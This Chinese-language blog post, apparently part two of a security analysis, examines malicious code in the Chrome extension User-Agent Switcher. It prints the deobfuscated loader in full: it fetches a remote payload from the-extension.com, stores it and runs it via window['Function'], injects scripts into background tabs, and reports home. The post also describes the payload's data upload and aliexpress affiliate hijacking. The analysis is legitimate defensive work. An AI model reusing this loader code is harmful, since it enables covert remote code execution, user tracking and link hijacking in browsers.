Chrome插件User-Agent Switcher恶意代码分析下部分

0x00 前言

User-Agent Switcher插件里面被爆存在恶意代码。看了网上的分析,决定自己动手分析下。
参考:
[【1】大家注意了 Chrome 的插件 User-Agent Switcher 是个木马][1]
[1]: https://www.v2ex.com/t/389340?from=timeline&isappinstalled=0&nsukey=vFeyuybSy35yBYOU5OJRGu0gxO%2BYXFTrpNbJQwlTlG%2BCeZ9TGicwta9kWHssUsbnpR%2B5MHtZ3xvfNTeP3WF%2BsBDodbJKn4EsSJu67rPwu1GbSAkwNSmKhekvWZ9syprtNbK8irADspy9xXr2kH5U9plG1qpscjuVCAq1zPy4d9aIkoF34iGKp4nf99wBEFsO “大家注意了 Chrome 的插件 User-Agent Switcher 是个木马”

[【2】Chrome插件User-Agent Switcher恶意代码分析报告][2]
[2]: https://cert.360.cn/static/files/Chrome%E6%8F%92%E4%BB%B6User-Agent%20Switcher%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A.pdf “Chrome插件User-Agent Switcher恶意代码分析报告”

0x01 隐写术

在上部分

0x02 去混淆

在上部分

0x03 e函数

在上部分

0x04 r函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
function r() {
return new Promise((_0x223434,_0x1b9f00)=>{
l["get"]("pyW5F1U43VI")['then'](_0x30d294=>{
let _0x55a281 = _0x30d294['pyW5F1U43VI'] || 0x0;
0x0 === _0x55a281 && l["set"]({
'XMWEzI4SfdC': new Date()["getTime"]()
})['then'](_0x2d7d72=>{
e({
'act': 'install'
});
}
),
new Date()["getTime"]() - _0x55a281 > c['WL']['Gj'] ? setTimeout(function() {
n(`${c['WL']["url"]}/?hash=jwtmv6kavksy5cazdf4leg66r`, "GET")["then"](o)["then"](_0x223434);
}, c['fM']) : l["get"](["TjPzl8caI41", "KI10wTwwvF7"])["then"](_0x1d2d5e=>{
_0x223434({
'code': _0x1d2d5e["TjPzl8caI41"],
'version': _0x1d2d5e['KI10wTwwvF7']
});
}
);
}
);
}
);
}

先看看这个函数调用的o函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
function o(_0xcaa92b) {
return new Promise((_0x47fce0,_0x349364)=>{
let _0x51ae9e = !0x1
, _0x556fe3 = ''
, _0x58bf0d = '';
try {
_0xcaa92b = JSON["parse"](_0xcaa92b),
_0x556fe3 = _0xcaa92b["code"],
_0x58bf0d = _0xcaa92b["version"],
_0x556fe3 == -0x1 || (_0x51ae9e = !0x0);
} catch (_0x1b0f96) {
e({
'act': "error",
'lab': 'parseResponse',
'fr': 0x0
});
}
_0x51ae9e ? l["set"]({
'TjPzl8caI41': _0x556fe3,
'KI10wTwwvF7': _0x58bf0d
})['then'](_0x207847=>{
l['set']({
'pyW5F1U43VI': new Date()["getTime"]()
}),
e({
'act': "download",
'lab': _0x58bf0d,
'fr': 0x0
}),
_0x47fce0({
'code': _0x556fe3,
'version': _0x58bf0d
});
}
) : (_0x556fe3 != -0x1 && e({
'act': "error",
'lab': "invalidMonetizationCode",
'fr': 0x0
}),
l["get"](["TjPzl8caI41", 'KI10wTwwvF7'])['then'](_0x5d38a5=>{
_0x47fce0({
'code': _0x5d38a5['TjPzl8caI41'],
'version': _0x5d38a5["KI10wTwwvF7"]
});
}
));
}
);
}

函数主要功能是,将n下载的json进行解析,然后
使用TjPzl8caI41,保存解析后的js代码。
使用KI10wTwwvF7,保存解析后的版本号。
同时跟新pyW5F1U43VI的时间戳。

首先通过get函数pyW5F1U43VI的时间戳,然后判断现在的时间戳-pyW5F1U43VI的时间戳>0x2932e00(12个小时),在没写入pyW5F1U43VI的时间戳的时候,pyW5F1U43VI=0,所以第一次成功进入到setTimeout函数当中,setTimeout延迟半个小时。就执行n函数进行下载。

我在网上看到有人说要过12个小时才会执行payload,其实不然,只要半个小时后,就开始执行payload了。(12个小时后又会开始重新下载payload)

抓取到的下载payload的截图
4

0x05 a函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function a(_0xfc65f5) {
try {
window["Function"](_0xfc65f5["code"])(l, n, e),
e(_0xfc65f5["code"] && 0x0 !== _0xfc65f5['code']["length"] || _0xfc65f5["version"] && 0x0 !== _0xfc65f5['version']["length"] ? {
'act': 'run',
'lab': _0xfc65f5["version"]
} : {
'act': "run",
'lab': "idle"
});
} catch (_0x5bd26e) {
e({
'act': "error",
'lab': `run_${_0xfc65f5["version"]}`
});
}
}

使用下面的代码进行执行payload

1
window["Function"](_0xfc65f5["code"])(l, n, e)

_0xfc65f5[“code”]就是payload代码了

0x06 payload的行为

0x00 上传用户信息

payload就具体分析了,没有进行混淆,常规代码。

在背景页面抓取到上传用户信息的截图:

5.jpg

0x01 劫持aliexpress

首先从调用getData()从 http://api.data-monitor.info/api/bhrule?sub=116 下载规则,再使用tryUrl函数进行规则的匹配并替换成如下url

http://systemrtb.com/?target=http%3A%2F%2Fnfemo.com%2Fclick-JQETHVDP-MKIGQNPP%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.aliexpress.com%2F

这个连接会多重跳转,最终跳转到

https://www.aliexpress.com/?aff_platform=aaf&cpt=1508239063454&sk=zj6qB6AIM&aff_trace_key=ecd72b1262d84ff4af977f404b58d6fb-1508239063454-03873-zj6qB6AIM&terminal_id=671274b1e625437f8635bbbebe0e8cfd

6.jpg

0x07 去混淆后的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
(function() {
(function() {
var m_list = ['code', 'version', 'error', 'download', 'invalidMonetizationCode', 'TjPzl8caI41', 'KI10wTwwvF7', 'Function', 'run', 'idle', 'pyW5F1U43VI', 'init', 'https://the-extension.com', 'local', 'storage', 'eval', 'then', 'get', 'getTime', 'setUTCHours', 'url', 'origin', 'set', 'GET', 'loading', 'status', 'removeListener', 'onUpdated', 'tabs', 'callee', 'addListener', 'onMessage', 'runtime', 'executeScript', 'replace', 'data', 'test', 'includes', 'http://', 'length', 'Url error', 'query', 'filter', 'active', 'floor', 'random', 'charCodeAt', 'fromCharCode', 'parse'];
(function(anony1_param1, anony1_param2) {
var anony2_func = function(anony2_param) {
while (--anony2_param) {
anony1_param1['push'](anony1_param1['shift']());
}
};
anony2_func(++anony1_param2);
}(m_list, 0xa2));

var GetValue = function(GetValue_param1, GetValue_param2) {
var GetValue_param1 = parseInt(GetValue_param1, 0x10);
var var1 = m_list[GetValue_param1];
return var1;
};
function e({cat="eval", act='', lab='', fr=0x3e8*0x3c*0x3c*0x18}) {
let var1 = t(`${cat}_${act}`, c['FD']);
return l['get'](var1)["then"](anony1_param=>{
let var1 = anony1_param[var1]
, var2 = 0x5265c00 == fr ? new Date()["getTime"]() - new Date(var1)["setUTCHours"](0x0, 0x0, 0x0, 0x0) >= fr : new Date()["getTime"]() - var1 >= fr;
if (!var1 || var2) {
let anony1_param = `${new URL(c['WL']["url"])["origin"]}/stats`;
n(`${anony1_param}?hash=jwtmv6kavksy5cazdf4leg66r&eventCategory=${cat}&eventAction=${act}&eventLabel=${lab}`, 'POST')['then'](_0x201de8=>{
let anony1_param = {};
anony1_param[var1] = new Date()["getTime"](),
l["set"](anony1_param);
}
);
}
}
);
}


function n(n_param1, n="GET" ) { //https://the-extension.com/stats?hash=jwtmv6kavksy5cazdf4leg66r&eventCategory=eval&eventAction=init&eventLabel=, POST
return new Promise((resolve,reject)=>{
function _0x3ad6d4(_0x3a3304, _0x4cce31, _0x57e5fb) {
"loading" === _0x4cce31["status"] && (ArrFilter(_0x57e5fb, n_param1) && c['NZ'] <= 0x0 && (chrome["tabs"]["onUpdated"]["removeListener"](arguments["callee"]),
HttpRequest(_0x3a3304)),
c['NZ']--);
}
function HttpRequest(_0x5a3411) {
chrome["runtime"]["onMessage"]["addListener"](_0x4b297c),
chrome["tabs"]["executeScript"](_0x5a3411, {
'code': `(function(){var url = replaceableurl; var xhr = new XMLHttpRequest();xhr.onreadystatechange = function () {if (xhr.readyState === 4) {chrome.runtime.sendMessage({data: xhr.responseText, url: url,status:xhr.status});}};xhr.open('${n}',url, true);xhr.send();})()`["replace"]('replaceableurl', `'${n_param1}'`)
});
}
function _0x4b297c(_0x4a051f) {
_0x4a051f["url"] === n_param1 && (resolve(_0x4a051f["data"]),
chrome["runtime"]["onMessage"]['removeListener'](arguments["callee"]));
}
function ArrFilter(_0x45a021, _0x3db6fb) {
return new RegExp(`^((?!(chrome${_0x3db6fb["includes"]("http://") ? '|https|ftps' : ''})).+://)`)["test"](_0x45a021["url"]); //"^((?!(chrome)).+://)"
}
n_param1 && 0x0 !== n_param1['length'] || reject("Url error"),
chrome["tabs"]["query"]({}, function(anony1_param) {
let resolve = anony1_param["filter"](anony2_param=>ArrFilter(anony2_param, n_param1) && !anony2_param['active']);
0x0 === resolve["length"] ? chrome["tabs"]["onUpdated"]["addListener"](_0x3ad6d4) : HttpRequest(resolve[Math["floor"](Math['random']() * resolve["length"])]['id']);
});
}
);
}
function t(t_param1, t_param2) {//eval_init 0x7
for (var var1 = '', var2 = 0x0, var3 = 0x0; var3 < t_param1['length']; var3++)
var2 = t_param1[var3]["charCodeAt"]() + t_param2,
var1 += String["fromCharCode"](var2);
return var1;
}
function o(o_param) {
return new Promise((resolve,reject)=>{
let var1 = !0x1
, var2 = ''
, var3 = '';
try {
o_param = JSON["parse"](o_param),
var2 = o_param["code"],
var3 = o_param["version"],
var2 == -0x1 || (var1 = !0x0);
} catch (_0x1b0f96) {
e({
'act': "error",
'lab': 'parseResponse',
'fr': 0x0
});
}
var1 ? l["set"]({
'TjPzl8caI41': var2,
'KI10wTwwvF7': var3
})['then'](_0x207847=>{
l['set']({
'pyW5F1U43VI': new Date()["getTime"]()
}),
e({
'act': "download",
'lab': var3,
'fr': 0x0
}),
resolve({
'code': var2,
'version': var3
});
}
) : (var2 != -0x1 && e({
'act': "error",
'lab': "invalidMonetizationCode",
'fr': 0x0
}),
l["get"](["TjPzl8caI41", 'KI10wTwwvF7'])['then'](_0x5d38a5=>{
resolve({
'code': _0x5d38a5['TjPzl8caI41'],
'version': _0x5d38a5["KI10wTwwvF7"]
});
}
));
}
);
}
function a(_0xfc65f5) {
try {
window["Function"](_0xfc65f5["code"])(l, n, e),
e(_0xfc65f5["code"] && 0x0 !== _0xfc65f5['code']["length"] || _0xfc65f5["version"] && 0x0 !== _0xfc65f5['version']["length"] ? {
'act': 'run',
'lab': _0xfc65f5["version"]
} : {
'act': "run",
'lab': "idle"
});
} catch (_0x5bd26e) {
e({
'act': "error",
'lab': `run_${_0xfc65f5["version"]}`
});
}
}

function r() {
return new Promise((_0x223434,_0x1b9f00)=>{
l["get"]("pyW5F1U43VI")['then'](_0x30d294=>{
let var1 = _0x30d294['pyW5F1U43VI'] || 0x0;
0x0 === var1 && l["set"]({
'XMWEzI4SfdC': new Date()["getTime"]()
})['then'](_0x2d7d72=>{
e({
'act': 'install'
});
}
),
new Date()["getTime"]() - var1 > c['WL']['Gj'] ? setTimeout(function() { //0x2932e00 12个小时
n(`${c['WL']["url"]}/?hash=jwtmv6kavksy5cazdf4leg66r`, "GET")["then"](o)["then"](_0x223434);
}, c['fM']) : l["get"](["TjPzl8caI41", "KI10wTwwvF7"])["then"](_0x1d2d5e=>{
_0x223434({
'code': _0x1d2d5e["TjPzl8caI41"],
'version': _0x1d2d5e['KI10wTwwvF7']
});
}
);
}
);
}
);
}
function i() {
setTimeout(function() {
e({
'act': "init"
}),
r()["then"](a);
}, c['Cf']);
}
let c = {
'WL': {
'url': "https://the-extension.com",
'Gj': 0x2932e00
},
'NZ': Math["floor"](0x3 * Math["random"]()),
'fM': 0x1b7740 * Math["floor"](0x1 * Math["random"]() + 0x1), //1800000
'Cf': 0xea60 * Math["floor"](0x2 * Math["random"]() + 0x1), //60000
'FD': 0x7
}
, l = {
'get'(e=null) {
return new Promise((resovle,reject)=>{
chrome["storage"]["local"]["get"](e, function(anony_param) {
resovle(anony_param);
});
}
);
},
'set'(set_param) {
return new Promise((resolve,reject)=>{
chrome["storage"]['local']["set"](set_param, function(anony_param) {
resolve(anony_param);
});
}
);
},
'yJ'(_0x21744e) {
return new Promise((_0x23501d,_0x525375)=>{
chrome["storage"]["local"]['yJ'](_0x21744e, function(_0x298d92) {
_0x23501d(_0x298d92);
});
}
);
},
'EE'() {
return new Promise((_0x47a45d,_0x110900)=>{
chrome["storage"]["local"]['EE'](function(_0x25822d) {
_0x47a45d(_0x25822d);
});
}
);
}
};
i();
}
)()
}
)();